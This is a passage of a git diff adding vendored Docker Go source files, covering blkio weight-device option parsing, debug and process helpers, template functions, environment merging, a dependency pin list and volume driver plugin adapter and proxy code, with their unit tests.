t.Fatalf("Expected %v or %v, got %v", expected, expected2, ulimitOpt) + } + + // And test GetList + ulimits := ulimitOpt.GetList() + if len(ulimits) != 2 { + t.Fatalf("Expected a ulimit list of 2, got %v", ulimits) + } +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go b/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go new file mode 100644 index 0000000000..2a5da6da08 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go @@ -0,0 +1,89 @@ +package opts + +import ( + "fmt" + "strconv" + "strings" + + "github.com/docker/docker/api/types/blkiodev" +) + +// ValidatorWeightFctType defines a validator function that returns a validated struct and/or an error. +type ValidatorWeightFctType func(val string) (*blkiodev.WeightDevice, error) + +// ValidateWeightDevice validates that the specified string has a valid device-weight format. +func ValidateWeightDevice(val string) (*blkiodev.WeightDevice, error) { + split := strings.SplitN(val, ":", 2) + if len(split) != 2 { + return nil, fmt.Errorf("bad format: %s", val) + } + if !strings.HasPrefix(split[0], "/dev/") { + return nil, fmt.Errorf("bad format for device path: %s", val) + } + weight, err := strconv.ParseUint(split[1], 10, 0) + if err != nil { + return nil, fmt.Errorf("invalid weight for device: %s", val) + } + if weight > 0 && (weight < 10 || weight > 1000) { + return nil, fmt.Errorf("invalid weight for device: %s", val) + } + + return &blkiodev.WeightDevice{ + Path: split[0], + Weight: uint16(weight), + }, nil +} + +// WeightdeviceOpt defines a map of WeightDevices +type WeightdeviceOpt struct { + values []*blkiodev.WeightDevice + validator ValidatorWeightFctType +} + +// NewWeightdeviceOpt creates a new WeightdeviceOpt +func NewWeightdeviceOpt(validator ValidatorWeightFctType) WeightdeviceOpt { + values := []*blkiodev.WeightDevice{} + return WeightdeviceOpt{ + values: values, + validator: validator, + } +} + +// Set validates a WeightDevice and sets its name as a key in WeightdeviceOpt +func (opt *WeightdeviceOpt) Set(val string) error { + var value *blkiodev.WeightDevice + if opt.validator != nil { + v, err := opt.validator(val) + if err != nil { + return err + } + value = v + } + (opt.values) = append((opt.values), value) + return nil +} + +// String returns WeightdeviceOpt values as a string. +func (opt *WeightdeviceOpt) String() string { + var out []string + for _, v := range opt.values { + out = append(out, v.String()) + } + + return fmt.Sprintf("%v", out) +} + +// GetList returns a slice of pointers to WeightDevices. +func (opt *WeightdeviceOpt) GetList() []*blkiodev.WeightDevice { + var weightdevice []*blkiodev.WeightDevice + for _, v := range opt.values { + weightdevice = append(weightdevice, v) + } + + return weightdevice +} + +// Type returns the option type +func (opt *WeightdeviceOpt) Type() string { + return "weighted-device" +} diff --git a/vendor/github.com/docker/docker/utils/debug.go b/vendor/github.com/docker/docker/utils/debug.go new file mode 100644 index 0000000000..d203891129 --- /dev/null +++ b/vendor/github.com/docker/docker/utils/debug.go @@ -0,0 +1,26 @@ +package utils + +import ( + "os" + + "github.com/Sirupsen/logrus" +) + +// EnableDebug sets the DEBUG env var to true +// and makes the logger to log at debug level. +func EnableDebug() { + os.Setenv("DEBUG", "1") + logrus.SetLevel(logrus.DebugLevel) +} + +// DisableDebug sets the DEBUG env var to false +// and makes the logger to log at info level. +func DisableDebug() { + os.Setenv("DEBUG", "") + logrus.SetLevel(logrus.InfoLevel) +} + +// IsDebugEnabled checks whether the debug flag is set or not. +func IsDebugEnabled() bool { + return os.Getenv("DEBUG") != "" +} diff --git a/vendor/github.com/docker/docker/utils/debug_test.go b/vendor/github.com/docker/docker/utils/debug_test.go new file mode 100644 index 0000000000..6f9c4dfbb0 --- /dev/null +++ b/vendor/github.com/docker/docker/utils/debug_test.go @@ -0,0 +1,43 @@ +package utils + +import ( + "os" + "testing" + + "github.com/Sirupsen/logrus" +) + +func TestEnableDebug(t *testing.T) { + defer func() { + os.Setenv("DEBUG", "") + logrus.SetLevel(logrus.InfoLevel) + }() + EnableDebug() + if os.Getenv("DEBUG") != "1" { + t.Fatalf("expected DEBUG=1, got %s\n", os.Getenv("DEBUG")) + } + if logrus.GetLevel() != logrus.DebugLevel { + t.Fatalf("expected log level %v, got %v\n", logrus.DebugLevel, logrus.GetLevel()) + } +} + +func TestDisableDebug(t *testing.T) { + DisableDebug() + if os.Getenv("DEBUG") != "" { + t.Fatalf("expected DEBUG=\"\", got %s\n", os.Getenv("DEBUG")) + } + if logrus.GetLevel() != logrus.InfoLevel { + t.Fatalf("expected log level %v, got %v\n", logrus.InfoLevel, logrus.GetLevel()) + } +} + +func TestDebugEnabled(t *testing.T) { + EnableDebug() + if !IsDebugEnabled() { + t.Fatal("expected debug enabled, got false") + } + DisableDebug() + if IsDebugEnabled() { + t.Fatal("expected debug disabled, got true") + } +} diff --git a/vendor/github.com/docker/docker/utils/names.go b/vendor/github.com/docker/docker/utils/names.go new file mode 100644 index 0000000000..632062819c --- /dev/null +++ b/vendor/github.com/docker/docker/utils/names.go @@ -0,0 +1,9 @@ +package utils + +import "regexp" + +// RestrictedNameChars collects the characters allowed to represent a name, normally used to validate container and volume names. +const RestrictedNameChars = `[a-zA-Z0-9][a-zA-Z0-9_.-]` + +// RestrictedNamePattern is a regular expression to validate names against the collection of restricted characters. +var RestrictedNamePattern = regexp.MustCompile(`^` + RestrictedNameChars + `+$`) diff --git a/vendor/github.com/docker/docker/utils/process_unix.go b/vendor/github.com/docker/docker/utils/process_unix.go new file mode 100644 index 0000000000..fc0b1c8b74 --- /dev/null +++ b/vendor/github.com/docker/docker/utils/process_unix.go @@ -0,0 +1,22 @@ +// +build linux freebsd solaris + +package utils + +import ( + "syscall" +) + +// IsProcessAlive returns true if process with a given pid is running. +func IsProcessAlive(pid int) bool { + err := syscall.Kill(pid, syscall.Signal(0)) + if err == nil || err == syscall.EPERM { + return true + } + + return false +} + +// KillProcess force-stops a process. +func KillProcess(pid int) { + syscall.Kill(pid, syscall.SIGKILL) +} diff --git a/vendor/github.com/docker/docker/utils/process_windows.go b/vendor/github.com/docker/docker/utils/process_windows.go new file mode 100644 index 0000000000..03cb855197 --- /dev/null +++ b/vendor/github.com/docker/docker/utils/process_windows.go @@ -0,0 +1,20 @@ +package utils + +// IsProcessAlive returns true if process with a given pid is running. +func IsProcessAlive(pid int) bool { + // TODO Windows containerd. Not sure this is needed + // p, err := os.FindProcess(pid) + // if err == nil { + // return true + // } + return false +} + +// KillProcess force-stops a process. +func KillProcess(pid int) { + // TODO Windows containerd. Not sure this is needed + // p, err := os.FindProcess(pid) + // if err == nil { + // p.Kill() + // } +} diff --git a/vendor/github.com/docker/docker/utils/templates/templates.go b/vendor/github.com/docker/docker/utils/templates/templates.go new file mode 100644 index 0000000000..91c376f38f --- /dev/null +++ b/vendor/github.com/docker/docker/utils/templates/templates.go @@ -0,0 +1,42 @@ +package templates + +import ( + "encoding/json" + "strings" + "text/template" +) + +// basicFunctions are the set of initial +// functions provided to every template. +var basicFunctions = template.FuncMap{ + "json": func(v interface{}) string { + a, _ := json.Marshal(v) + return string(a) + }, + "split": strings.Split, + "join": strings.Join, + "title": strings.Title, + "lower": strings.ToLower, + "upper": strings.ToUpper, + "pad": padWithSpace, +} + +// Parse creates a new annonymous template with the basic functions +// and parses the given format. +func Parse(format string) (*template.Template, error) { + return NewParse("", format) +} + +// NewParse creates a new tagged template with the basic functions +// and parses the given format. +func NewParse(tag, format string) (*template.Template, error) { + return template.New(tag).Funcs(basicFunctions).Parse(format) +} + +// padWithSpace adds whitespace to the input if the input is non-empty +func padWithSpace(source string, prefix, suffix int) string { + if source == "" { + return source + } + return strings.Repeat(" ", prefix) + source + strings.Repeat(" ", suffix) +} diff --git a/vendor/github.com/docker/docker/utils/templates/templates_test.go b/vendor/github.com/docker/docker/utils/templates/templates_test.go new file mode 100644 index 0000000000..dd42901aed --- /dev/null +++ b/vendor/github.com/docker/docker/utils/templates/templates_test.go @@ -0,0 +1,38 @@ +package templates + +import ( + "bytes" + "testing" +) + +func TestParseStringFunctions(t *testing.T) { + tm, err := Parse(`{{join (split . ":") "/"}}`) + if err != nil { + t.Fatal(err) + } + + var b bytes.Buffer + if err := tm.Execute(&b, "text:with:colon"); err != nil { + t.Fatal(err) + } + want := "text/with/colon" + if b.String() != want { + t.Fatalf("expected %s, got %s", want, b.String()) + } +} + +func TestNewParse(t *testing.T) { + tm, err := NewParse("foo", "this is a {{ . }}") + if err != nil { + t.Fatal(err) + } + + var b bytes.Buffer + if err := tm.Execute(&b, "string"); err != nil { + t.Fatal(err) + } + want := "this is a string" + if b.String() != want { + t.Fatalf("expected %s, got %s", want, b.String()) + } +} diff --git a/vendor/github.com/docker/docker/utils/utils.go b/vendor/github.com/docker/docker/utils/utils.go new file mode 100644 index 0000000000..d3dd00abf4 --- /dev/null +++ b/vendor/github.com/docker/docker/utils/utils.go @@ -0,0 +1,87 @@ +package utils + +import ( + "fmt" + "io/ioutil" + "os" + "runtime" + "strings" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/stringid" +) + +var globalTestID string + +// TestDirectory creates a new temporary directory and returns its path. +// The contents of directory at path `templateDir` is copied into the +// new directory. +func TestDirectory(templateDir string) (dir string, err error) { + if globalTestID == "" { + globalTestID = stringid.GenerateNonCryptoID()[:4] + } + prefix := fmt.Sprintf("docker-test%s-%s-", globalTestID, GetCallerName(2)) + if prefix == "" { + prefix = "docker-test-" + } + dir, err = ioutil.TempDir("", prefix) + if err = os.Remove(dir); err != nil { + return + } + if templateDir != "" { + if err = archive.CopyWithTar(templateDir, dir); err != nil { + return + } + } + return +} + +// GetCallerName introspects the call stack and returns the name of the +// function `depth` levels down in the stack. +func GetCallerName(depth int) string { + // Use the caller function name as a prefix. + // This helps trace temp directories back to their test. + pc, _, _, _ := runtime.Caller(depth + 1) + callerLongName := runtime.FuncForPC(pc).Name() + parts := strings.Split(callerLongName, ".") + callerShortName := parts[len(parts)-1] + return callerShortName +} + +// ReplaceOrAppendEnvValues returns the defaults with the overrides either +// replaced by env key or appended to the list +func ReplaceOrAppendEnvValues(defaults, overrides []string) []string { + cache := make(map[string]int, len(defaults)) + for i, e := range defaults { + parts := strings.SplitN(e, "=", 2) + cache[parts[0]] = i + } + + for _, value := range overrides { + // Values w/o = means they want this env to be removed/unset. + if !strings.Contains(value, "=") { + if i, exists := cache[value]; exists { + defaults[i] = "" // Used to indicate it should be removed + } + continue + } + + // Just do a normal set/update + parts := strings.SplitN(value, "=", 2) + if i, exists := cache[parts[0]]; exists { + defaults[i] = value + } else { + defaults = append(defaults, value) + } + } + + // Now remove all entries that we want to "unset" + for i := 0; i < len(defaults); i++ { + if defaults[i] == "" { + defaults = append(defaults[:i], defaults[i+1:]...) + i-- + } + } + + return defaults +} diff --git a/vendor/github.com/docker/docker/utils/utils_test.go b/vendor/github.com/docker/docker/utils/utils_test.go new file mode 100644 index 0000000000..ab3911e8b3 --- /dev/null +++ b/vendor/github.com/docker/docker/utils/utils_test.go @@ -0,0 +1,21 @@ +package utils + +import "testing" + +func TestReplaceAndAppendEnvVars(t *testing.T) { + var ( + d = []string{"HOME=/"} + o = []string{"HOME=/root", "TERM=xterm"} + ) + + env := ReplaceOrAppendEnvValues(d, o) + if len(env) != 2 { + t.Fatalf("expected len of 2 got %d", len(env)) + } + if env[0] != "HOME=/root" { + t.Fatalf("expected HOME=/root got '%s'", env[0]) + } + if env[1] != "TERM=xterm" { + t.Fatalf("expected TERM=xterm got '%s'", env[1]) + } +} diff --git a/vendor/github.com/docker/docker/vendor.conf b/vendor/github.com/docker/docker/vendor.conf new file mode 100644 index 0000000000..bb7718bc42 --- /dev/null +++ b/vendor/github.com/docker/docker/vendor.conf @@ -0,0 +1,140 @@ +# the following lines are in sorted order, FYI +github.com/Azure/go-ansiterm 388960b655244e76e24c75f48631564eaefade62 +github.com/Microsoft/hcsshim v0.5.9 +github.com/Microsoft/go-winio v0.3.8 +github.com/Sirupsen/logrus v0.11.0 +github.com/davecgh/go-spew 6d212800a42e8ab5c146b8ace3490ee17e5225f9 +github.com/docker/libtrust 9cbd2a1374f46905c68a4eb3694a130610adc62a +github.com/go-check/check 4ed411733c5785b40214c70bce814c3a3a689609 https://github.com/cpuguy83/check.git +github.com/gorilla/context v1.1 +github.com/gorilla/mux v1.1 +github.com/kr/pty 5cf931ef8f +github.com/mattn/go-shellwords v1.0.0 +github.com/mattn/go-sqlite3 v1.1.0 +github.com/tchap/go-patricia v2.2.6 +github.com/vdemeester/shakers 24d7f1d6a71aa5d9cbe7390e4afb66b7eef9e1b3 +# forked golang.org/x/net package includes a patch for lazy loading trace templates +golang.org/x/net 2beffdc2e92c8a3027590f898fe88f69af48a3f8 https://github.com/tonistiigi/net.git +golang.org/x/sys 8f0908ab3b2457e2e15403d3697c9ef5cb4b57a9 +github.com/docker/go-units 8a7beacffa3009a9ac66bad506b18ffdd110cf97 +github.com/docker/go-connections ecb4cb2dd420ada7df7f2593d6c25441f65f69f2 + +github.com/RackSec/srslog 456df3a81436d29ba874f3590eeeee25d666f8a5 +github.com/imdario/mergo 0.2.1 + +#get libnetwork packages +github.com/docker/libnetwork 45b40861e677e37cf27bc184eca5af92f8cdd32d +github.com/docker/go-events 18b43f1bc85d9cdd42c05a6cd2d444c7a200a894 +github.com/armon/go-radix e39d623f12e8e41c7b5529e9a9dd67a1e2261f80 +github.com/armon/go-metrics eb0af217e5e9747e41dd5303755356b62d28e3ec +github.com/hashicorp/go-msgpack 71c2886f5a673a35f909803f38ece5810165097b +github.com/hashicorp/memberlist 88ac4de0d1a0ca6def284b571342db3b777a4c37 +github.com/hashicorp/go-multierror fcdddc395df1ddf4247c69bd436e84cfa0733f7e +github.com/hashicorp/serf 598c54895cc5a7b1a24a398d635e8c0ea0959870 +github.com/docker/libkv 1d8431073ae03cdaedb198a89722f3aab6d418ef +github.com/vishvananda/netns 604eaf189ee867d8c147fafc28def2394e878d25 +github.com/vishvananda/netlink 482f7a52b758233521878cb6c5904b6bd63f3457 +github.com/BurntSushi/toml f706d00e3de6abe700c994cdd545a1a4915af060 +github.com/samuel/go-zookeeper d0e0d8e11f318e000a8cc434616d69e329edc374 +github.com/deckarep/golang-set ef32fa3046d9f249d399f98ebaf9be944430fd1d +github.com/coreos/etcd 3a49cbb769ebd8d1dd25abb1e83386e9883a5707 +github.com/ugorji/go f1f1a805ed361a0e078bb537e4ea78cd37dcf065 +github.com/hashicorp/consul v0.5.2 +github.com/boltdb/bolt fff57c100f4dea1905678da7e90d92429dff2904 +github.com/miekg/dns 75e6e86cc601825c5dbcd4e0c209eab180997cd7 + +# get graph and distribution packages +github.com/docker/distribution 28602af35aceda2f8d571bad7ca37a54cf0250bc +github.com/vbatts/tar-split v0.10.1 + +# get go-zfs packages +github.com/mistifyio/go-zfs 22c9b32c84eb0d0c6f4043b6e90fc94073de92fa +github.com/pborman/uuid v1.0 + +# get desired notary commit, might also need to be updated in Dockerfile +github.com/docker/notary v0.4.2 + +google.golang.org/grpc v1.0.2 +github.com/miekg/pkcs11 df8ae6ca730422dba20c768ff38ef7d79077a59f +github.com/docker/go v1.5.1-1-1-gbaf439e +github.com/agl/ed25519 d2b94fd789ea21d12fac1a4443dd3a3f79cda72c + +# When updating, also update RUNC_COMMIT in hack/dockerfile/binaries-commits accordingly +github.com/opencontainers/runc 9df8b306d01f59d3a8029be411de015b7304dd8f https://github.com/docker/runc.git # libcontainer +github.com/opencontainers/runtime-spec 1c7c27d043c2a5e513a44084d2b10d77d1402b8c # specs +github.com/seccomp/libseccomp-golang 32f571b70023028bd57d9288c20efbcb237f3ce0 +# libcontainer deps (see src/github.com/opencontainers/runc/Godeps/Godeps.json) +github.com/coreos/go-systemd v4 +github.com/godbus/dbus v4.0.0 +github.com/syndtr/gocapability 2c00daeb6c3b45114c80ac44119e7b8801fdd852 +github.com/golang/protobuf 1f49d83d9aa00e6ce4fc8258c71cc7786aec968a + +# gelf logging driver deps +github.com/Graylog2/go-gelf aab2f594e4585d43468ac57287b0dece9d806883 + +github.com/fluent/fluent-logger-golang v1.2.1 +# fluent-logger-golang deps +github.com/philhofer/fwd 899e4efba8eaa1fea74175308f3fae18ff3319fa +github.com/tinylib/msgp 75ee40d2601edf122ef667e2a07d600d4c44490c + +# fsnotify +github.com/fsnotify/fsnotify v1.2.11 + +# awslogs deps +github.com/aws/aws-sdk-go v1.4.22 +github.com/go-ini/ini 060d7da055ba6ec5ea7a31f116332fe5efa04ce0 +github.com/jmespath/go-jmespath 0b12d6b521d83fc7f755e7cfc1b1fbdd35a01a74 + +# logentries +github.com/bsphere/le_go d3308aafe090956bc89a65f0769f58251a1b4f03 + +# gcplogs deps +golang.org/x/oauth2 2baa8a1b9338cf13d9eeb27696d761155fa480be +google.golang.org/api dc6d2353af16e2a2b0ff6986af051d473a4ed468 +google.golang.org/cloud dae7e3d993bc3812a2185af60552bb6b847e52a0 + +# native credentials +github.com/docker/docker-credential-helpers f72c04f1d8e71959a6d103f808c50ccbad79b9fd + +# containerd +github.com/docker/containerd aa8187dbd3b7ad67d8e5e3a15115d3eef43a7ed1 +github.com/tonistiigi/fifo 1405643975692217d6720f8b54aeee1bf2cd5cf4 + +# cluster +github.com/docker/swarmkit 1c7f003d75f091d5f7051ed982594420e4515f77 +github.com/golang/mock bd3c8e81be01eef76d4b503f5e687d2d1354d2d9 +github.com/gogo/protobuf v0.3 +github.com/cloudflare/cfssl 7fb22c8cba7ecaf98e4082d22d65800cf45e042a +github.com/google/certificate-transparency d90e65c3a07988180c5b1ece71791c0b6506826e +golang.org/x/crypto 3fbbcd23f1cb824e69491a5930cfeff09b12f4d2 +golang.org/x/time a4bde12657593d5e90d0533a3e4fd95e635124cb +github.com/mreiferson/go-httpclient 63fe23f7434723dc904c901043af07931f293c47 +github.com/hashicorp/go-memdb 608dda3b1410a73eaf3ac8b517c9ae7ebab6aa87 +github.com/hashicorp/go-immutable-radix 8e8ed81f8f0bf1bdd829593fdd5c29922c1ea990 +github.com/hashicorp/golang-lru a0d98a5f288019575c6d1f4bb1573fef2d1fcdc4 +github.com/coreos/pkg fa29b1d70f0beaddd4c7021607cc3c3be8ce94b8 +github.com/pivotal-golang/clock 3fd3c1944c59d9742e1cd333672181cd1a6f9fa0 +github.com/prometheus/client_golang 52437c81da6b127a9925d17eb3a382a2e5fd395e +github.com/beorn7/perks 4c0e84591b9aa9e6dcfdf3e020114cd81f89d5f9 +github.com/prometheus/client_model fa8ad6fec33561be4280a8f0514318c79d7f6cb6 +github.com/prometheus/common ebdfc6da46522d58825777cf1f90490a5b1ef1d8 +github.com/prometheus/procfs abf152e5f3e97f2fafac028d2cc06c1feb87ffa5 +bitbucket.org/ww/goautoneg 75cd24fc2f2c2a2088577d12123ddee5f54e0675 +github.com/matttproud/golang_protobuf_extensions fc2b8d3a73c4867e51861bbdd5ae3c1f0869dd6a +github.com/pkg/errors 839d9e913e063e28dfd0e6c7b7512793e0a48be9 + +# cli +github.com/spf13/cobra v1.5 https://github.com/dnephin/cobra.git +github.com/spf13/pflag dabebe21bf790f782ea4c7bbd2efc430de182afd +github.com/inconshreveable/mousetrap 76626ae9c91c4f2a10f34cad8ce83ea42c93bb75 +github.com/flynn-archive/go-shlex 3f9db97f856818214da2e1057f8ad84803971cff + +# metrics +github.com/docker/go-metrics 86138d05f285fd9737a99bee2d9be30866b59d72 + +# composefile +github.com/mitchellh/mapstructure f3009df150dadf309fdee4a54ed65c124afad715 +github.com/xeipuuv/gojsonpointer e0fe6f68307607d540ed8eac07a342c33fa1b54a +github.com/xeipuuv/gojsonreference e02fc20de94c78484cd5ffb007f8af96be030a45 +github.com/xeipuuv/gojsonschema 93e72a773fade158921402d6a24c819b48aba29d +gopkg.in/yaml.v2 a83829b6f1293c91addabc89d0571c246397bbf4 diff --git a/vendor/github.com/docker/docker/volume/drivers/adapter.go b/vendor/github.com/docker/docker/volume/drivers/adapter.go new file mode 100644 index 0000000000..62ef7dfe60 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/drivers/adapter.go @@ -0,0 +1,177 @@ +package volumedrivers + +import ( + "errors" + "path/filepath" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/volume" +) + +var ( + errNoSuchVolume = errors.New("no such volume") +) + +type volumeDriverAdapter struct { + name string + baseHostPath string + capabilities *volume.Capability + proxy *volumeDriverProxy +} + +func (a *volumeDriverAdapter) Name() string { + return a.name +} + +func (a *volumeDriverAdapter) Create(name string, opts map[string]string) (volume.Volume, error) { + if err := a.proxy.Create(name, opts); err != nil { + return nil, err + } + return &volumeAdapter{ + proxy: a.proxy, + name: name, + driverName: a.name, + baseHostPath: a.baseHostPath, + }, nil +} + +func (a *volumeDriverAdapter) Remove(v volume.Volume) error { + return a.proxy.Remove(v.Name()) +} + +func hostPath(baseHostPath, path string) string { + if baseHostPath != "" { + path = filepath.Join(baseHostPath, path) + } + return path +} + +func (a *volumeDriverAdapter) List() ([]volume.Volume, error) { + ls, err := a.proxy.List() + if err != nil { + return nil, err + } + + var out []volume.Volume + for _, vp := range ls { + out = append(out, &volumeAdapter{ + proxy: a.proxy, + name: vp.Name, + baseHostPath: a.baseHostPath, + driverName: a.name, + eMount: hostPath(a.baseHostPath, vp.Mountpoint), + }) + } + return out, nil +} + +func (a *volumeDriverAdapter) Get(name string) (volume.Volume, error) { + v, err := a.proxy.Get(name) + if err != nil { + return nil, err + } + + // plugin may have returned no volume and no error + if v == nil { + return nil, errNoSuchVolume + } + + return &volumeAdapter{ + proxy: a.proxy, + name: v.Name, + driverName: a.Name(), + eMount: v.Mountpoint, + status: v.Status, + baseHostPath: a.baseHostPath, + }, nil +} + +func (a *volumeDriverAdapter) Scope() string { + cap := a.getCapabilities() + return cap.Scope +} + +func (a *volumeDriverAdapter) getCapabilities() volume.Capability { + if a.capabilities != nil { + return *a.capabilities + } + cap, err := a.proxy.Capabilities() + if err != nil { + // `GetCapabilities` is a not a required endpoint. + // On error assume it's a local-only driver + logrus.Warnf("Volume driver %s returned an error while trying to query its capabilities, using default capabilties: %v", a.name, err) + return volume.Capability{Scope: volume.LocalScope} + } + + // don't spam the warn log below just because the plugin didn't provide a scope + if len(cap.Scope) == 0 { + cap.Scope = volume.LocalScope + } + + cap.Scope = strings.ToLower(cap.Scope) + if cap.Scope != volume.LocalScope && cap.Scope != volume.GlobalScope { + logrus.Warnf("Volume driver %q returned an invalid scope: %q", a.Name(), cap.Scope) + cap.Scope = volume.LocalScope + } + + a.capabilities = &cap + return cap +} + +type volumeAdapter struct { + proxy *volumeDriverProxy + name string + baseHostPath string + driverName string + eMount string // ephemeral host volume path + status map[string]interface{} +} + +type proxyVolume struct { + Name string + Mountpoint string + Status map[string]interface{} +} + +func (a *volumeAdapter) Name() string { + return a.name +} + +func (a *volumeAdapter) DriverName() string { + return a.driverName +} + +func (a *volumeAdapter) Path() string { + if len(a.eMount) == 0 { + mountpoint, _ := a.proxy.Path(a.name) + a.eMount = hostPath(a.baseHostPath, mountpoint) + } + return a.eMount +} + +func (a *volumeAdapter) CachedPath() string { + return a.eMount +} + +func (a *volumeAdapter) Mount(id string) (string, error) { + mountpoint, err := a.proxy.Mount(a.name, id) + a.eMount = hostPath(a.baseHostPath, mountpoint) + return a.eMount, err +} + +func (a *volumeAdapter) Unmount(id string) error { + err := a.proxy.Unmount(a.name, id) + if err == nil { + a.eMount = "" + } + return err +} + +func (a *volumeAdapter) Status() map[string]interface{} { + out := make(map[string]interface{}, len(a.status)) + for k, v := range a.status { + out[k] = v + } + return out +} diff --git a/vendor/github.com/docker/docker/volume/drivers/extpoint.go b/vendor/github.com/docker/docker/volume/drivers/extpoint.go new file mode 100644 index 0000000000..576dee8a1b --- /dev/null +++ b/vendor/github.com/docker/docker/volume/drivers/extpoint.go @@ -0,0 +1,215 @@ +//go:generate pluginrpc-gen -i $GOFILE -o proxy.go -type volumeDriver -name VolumeDriver + +package volumedrivers + +import ( + "fmt" + "sync" + + "github.com/docker/docker/pkg/locker" + getter "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/volume" +) + +// currently created by hand. generation tool would generate this like: +// $ extpoint-gen Driver > volume/extpoint.go + +var drivers = &driverExtpoint{ + extensions: make(map[string]volume.Driver), + driverLock: &locker.Locker{}, +} + +const extName = "VolumeDriver" + +// NewVolumeDriver returns a driver has the given name mapped on the given client. +func NewVolumeDriver(name string, baseHostPath string, c client) volume.Driver { + proxy := &volumeDriverProxy{c} + return &volumeDriverAdapter{name: name, baseHostPath: baseHostPath, proxy: proxy} +} + +// volumeDriver defines the available functions that volume plugins must implement. +// This interface is only defined to generate the proxy objects. +// It's not intended to be public or reused. +type volumeDriver interface { + // Create a volume with the given name + Create(name string, opts map[string]string) (err error) + // Remove the volume with the given name + Remove(name string) (err error) + // Get the mountpoint of the given volume + Path(name string) (mountpoint string, err error) + // Mount the given volume and return the mountpoint + Mount(name, id string) (mountpoint string, err error) + // Unmount the given volume + Unmount(name, id string) (err error) + // List lists all the volumes known to the driver + List() (volumes []*proxyVolume, err error) + // Get retrieves the volume with the requested name + Get(name string) (volume *proxyVolume, err error) + // Capabilities gets the list of capabilities of the driver + Capabilities() (capabilities volume.Capability, err error) +} + +type driverExtpoint struct { + extensions map[string]volume.Driver + sync.Mutex + driverLock *locker.Locker + plugingetter getter.PluginGetter +} + +// RegisterPluginGetter sets the plugingetter +func RegisterPluginGetter(plugingetter getter.PluginGetter) { + drivers.plugingetter = plugingetter +} + +// Register associates the given driver to the given name, checking if +// the name is already associated +func Register(extension volume.Driver, name string) bool { + if name == "" { + return false + } + + drivers.Lock() + defer drivers.Unlock() + + _, exists := drivers.extensions[name] + if exists { + return false + } + + if err := validateDriver(extension); err != nil { + return false + } + + drivers.extensions[name] = extension + + return true +} + +// Unregister dissociates the name from its driver, if the association exists. +func Unregister(name string) bool { + drivers.Lock() + defer drivers.Unlock() + + _, exists := drivers.extensions[name] + if !exists { + return false + } + delete(drivers.extensions, name) + return true +} + +// lookup returns the driver associated with the given name. If a +// driver with the given name has not been registered it checks if +// there is a VolumeDriver plugin available with the given name. +func lookup(name string, mode int) (volume.Driver, error) { + drivers.driverLock.Lock(name) + defer drivers.driverLock.Unlock(name) + + drivers.Lock() + ext, ok := drivers.extensions[name] + drivers.Unlock() + if ok { + return ext, nil + } + if drivers.plugingetter != nil { + p, err := drivers.plugingetter.Get(name, extName, mode) + if err != nil { + return nil, fmt.Errorf("Error looking up volume plugin %s: %v", name, err) + } + + d := NewVolumeDriver(p.Name(), p.BasePath(), p.Client()) + if err := validateDriver(d); err != nil { + return nil, err + } + + if p.IsV1() { + drivers.Lock() + drivers.extensions[name] = d + drivers.Unlock() + } + return d, nil + } + return nil, fmt.Errorf("Error looking up volume plugin %s", name) +} + +func validateDriver(vd volume.Driver) error { + scope := vd.Scope() + if scope != volume.LocalScope && scope != volume.GlobalScope { + return fmt.Errorf("Driver %q provided an invalid capability scope: %s", vd.Name(), scope) + } + return nil +} + +// GetDriver returns a volume driver by its name. +// If the driver is empty, it looks for the local driver. +func GetDriver(name string) (volume.Driver, error) { + if name == "" { + name = volume.DefaultDriverName + } + return lookup(name, getter.LOOKUP) +} + +// CreateDriver returns a volume driver by its name and increments RefCount. +// If the driver is empty, it looks for the local driver. +func CreateDriver(name string) (volume.Driver, error) { + if name == "" { + name = volume.DefaultDriverName + } + return lookup(name, getter.ACQUIRE) +} + +// RemoveDriver returns a volume driver by its name and decrements RefCount.. +// If the driver is empty, it looks for the local driver. +func RemoveDriver(name string) (volume.Driver, error) { + if name == "" { + name = volume.DefaultDriverName + } + return lookup(name, getter.RELEASE) +} + +// GetDriverList returns list of volume drivers registered. +// If no driver is registered, empty string list will be returned. +func GetDriverList() []string { + var driverList []string + drivers.Lock() + for driverName := range drivers.extensions { + driverList = append(driverList, driverName) + } + drivers.Unlock() + return driverList +} + +// GetAllDrivers lists all the registered drivers +func GetAllDrivers() ([]volume.Driver, error) { + var plugins []getter.CompatPlugin + if drivers.plugingetter != nil { + var err error + plugins, err = drivers.plugingetter.GetAllByCap(extName) + if err != nil { + return nil, fmt.Errorf("error listing plugins: %v", err) + } + } + var ds []volume.Driver + + drivers.Lock() + defer drivers.Unlock() + + for _, d := range drivers.extensions { + ds = append(ds, d) + } + + for _, p := range plugins { + name := p.Name() + ext, ok := drivers.extensions[name] + if ok { + continue + } + + ext = NewVolumeDriver(name, p.BasePath(), p.Client()) + if p.IsV1() { + drivers.extensions[name] = ext + } + ds = append(ds, ext) + } + return ds, nil +} diff --git a/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go b/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go new file mode 100644 index 0000000000..428b0752f2 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/drivers/extpoint_test.go @@ -0,0 +1,23 @@ +package volumedrivers + +import ( + "testing" + + volumetestutils "github.com/docker/docker/volume/testutils" +) + +func TestGetDriver(t *testing.T) { + _, err := GetDriver("missing") + if err == nil { + t.Fatal("Expected error, was nil") + } + Register(volumetestutils.NewFakeDriver("fake"), "fake") + + d, err := GetDriver("fake") + if err != nil { + t.Fatal(err) + } + if d.Name() != "fake" { + t.Fatalf("Expected fake driver, got %s\n", d.Name()) + } +} diff --git a/vendor/github.com/docker/docker/volume/drivers/proxy.go b/vendor/github.com/docker/docker/volume/drivers/proxy.go new file mode 100644 index 0000000000..b23db6258f --- /dev/null +++ b/vendor/github.com/docker/docker/volume/drivers/proxy.go @@ -0,0 +1,242 @@ +// generated code - DO NOT EDIT + +package volumedrivers + +import ( + "errors" + + "github.com/docker/docker/volume" +) + +type client interface { + Call(string, interface{}, interface{}) error +} + +type volumeDriverProxy struct { + client +} + +type volumeDriverProxyCreateRequest struct { + Name string + Opts map[string]string +} + +type volumeDriverProxyCreateResponse struct { + Err string +} + +func (pp *volumeDriverProxy) Create(name string, opts map[string]string) (err error) { + var ( + req 